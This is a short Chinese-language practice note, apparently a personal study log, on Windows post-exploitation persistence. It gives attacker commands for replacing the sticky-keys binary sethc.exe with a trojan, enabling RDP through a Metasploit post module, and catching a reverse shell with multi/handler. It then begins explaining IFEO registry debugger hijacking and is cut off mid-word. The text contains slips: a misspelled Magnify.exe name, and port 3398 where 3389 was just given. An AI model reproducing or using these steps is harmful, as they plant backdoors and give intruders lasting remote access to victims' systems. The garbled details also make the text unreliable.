前言:
分享学习心得,实操笔记记录
为了演示,存放在windows下的木马路径为c:\windows\muma.exe
实操开始:
一:辅助功能镜像劫持。
就比如说想粘滞键这样的程序 或者放大镜这些都是windows的辅助功能,缺点就是老版本的系统比较适用,windows2012以下可以尝试
exe程序存放路径:
屏幕键盘:c:\windows\system32\osk.exe
放大镜:c:\windows\system32\Mageify.exe
粘滞键: c:\windows\system32\sethc.exe
条件是需要能连接到rdp3389端口
开启对方3389端口:run post/windows/manage/enable_rdp
Kali远程连接:rdesktop 对方ip:3398
替换命令粘字键:copy c:\windows\muma.exe c:\windows\system32\sethc.exe
msfconsole开启use exploit/multi/handler监听
打开msf等待接收shell就ok!
二:IFEO,映像劫持
就是一种技术手段,原理类似于辅助功能镜像劫持,改的是注册表里面的东西
原理:
当我们双击运行程序的时候。系统就会查询IFEO注册表。如果发现存在完全相同的子键,就会查询对应的子键中包含的"debugger"键值名,如果这个键值名不为空的情况下 系统则会吧debugger参数指定的程序文件来作为启动的程序,当对方打开对应的软件就会运行我们的木马
拿